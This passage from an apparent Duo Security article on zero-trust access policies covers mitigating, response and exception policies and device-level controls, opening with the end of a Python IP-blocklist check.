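    addr = ipaddress.ip_address(source_ip)
    return any(addr in network for network in BLOCKED_NETWORKS)
```

This keeps large populations that should never be authenticating from rattling the doorknobs at all, while your stronger controls handle the determined attacker.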


Mitigating

There are some policies that are used to mitigate the effects of other policies. Multi-factor authentication is an important security control, but some users don’t like having to use it every time they need to use a resource. An organization may decide that after the initial authentication to a system, the risk is low enough to delay re-authenticating for a certain period of time. One example of this is “remembering” a user or device, or both. For Duo, you would set a policy like this one:

Remembered Devices by Duo Security

Another possible mitigating policy is to skip the second authentication factor for devices on particular trusted network segments. However, once you begin trusting something more when it’s on the “inside” of your network perimeter, you’re in danger of undermining what BeyondCorp is all about: the idea that you shouldn’t trust the inside any more than the outside. So use these “loosening” policies with caution.


Responding

Organizations can also put temporary policies in place to respond to a particular event. If a critical vulnerability is announced for a plugin, for example, and you know your users are at risk because the vulnerability is already being exploited, then you may want to block users until they get the patched version installed. In other words, you would shrink the time window or grace period of a regular policy for just this one situation.

Other response-type policies could include placing geolocation or network restrictions on a device that someone can’t find — until they either find it again, or determine that it was really lost or stolen. If they find it where they expected, they can use it again right away, but if someone else tries to use it from a different location, they won’t be able to access corporate data with it. The same idea applies to an employee who is leaving; while they work out the notice period, their access policies might be tightened so that they can’t access applications that contain large stores of sensitive data.

Managing Exceptions To Policies

(also known as: “Negative. I am a Meat Popsicle.”)

For every policy, there is an equal and opposite exception. There may be good reasons why a set of endpoints can’t be fully updated: they don’t have regular access to enough network bandwidth; they’re dependent on one application that requires a certified stack to operate; it’s too politically sensitive to block your CEO even if she rooted her own phone. You never allow traffic through an anonymized proxy, except that one time when an employee is traveling abroad and can’t access some home resources any other way.

Strictly speaking, a firewall is an exception in itself: you know it’s risky to connect to the Internet, but you do it anyway because there are strong business reasons to do so. The firewall embodies and manages those exceptions (“Okay, but only for web applications …”). For your users, have a workflow process ready to receive exception requests, and for yourself, be ready to record and approve them with reminders to follow up if the policy exceptions are only temporary.

Another purpose for adding policy exceptions is to introduce change over time. You may have stricter policies in place for a smaller user group to try them out before deploying them to the rest of the population. Exceptions can also help troubleshoot all sorts of problems if you suspect an access policy is causing them: for the affected user, you create an exception for each policy you know applies to them, one at a time, until the guilty policy surfaces (or all of them are ruled out).

From The Big To The Small

Access policies can be used not only at the network and application levels, but also at the device and behavior levels. You can start by blocking access to whole categories of outliers (such as banning any use of an insecure browser), and then work your way towards requiring better endpoint hygiene, such as screen locks. In the case of Duo Mobile, you can require your users to validate their two-factor authentication (2FA) confirmation with a fingerprint on iOS, so that even if an attacker has access to the unlocked phone, they still can’t finish logging into the application.

The most important thing is to carve away at the devices, software, sources and behaviors you know you don’t want to allow, thereby reducing your exposure to attacks. Changing the security lifestyle of an organization takes dedicated work, but once you have fitted the controls more closely to where they belong — the users, their devices, and the applications — you’ll be addressing the gaps in today’s traditional security paradigm and moving Beyond it.

For more information on how to create access policies within Duo, check out this Duo Policy Guide.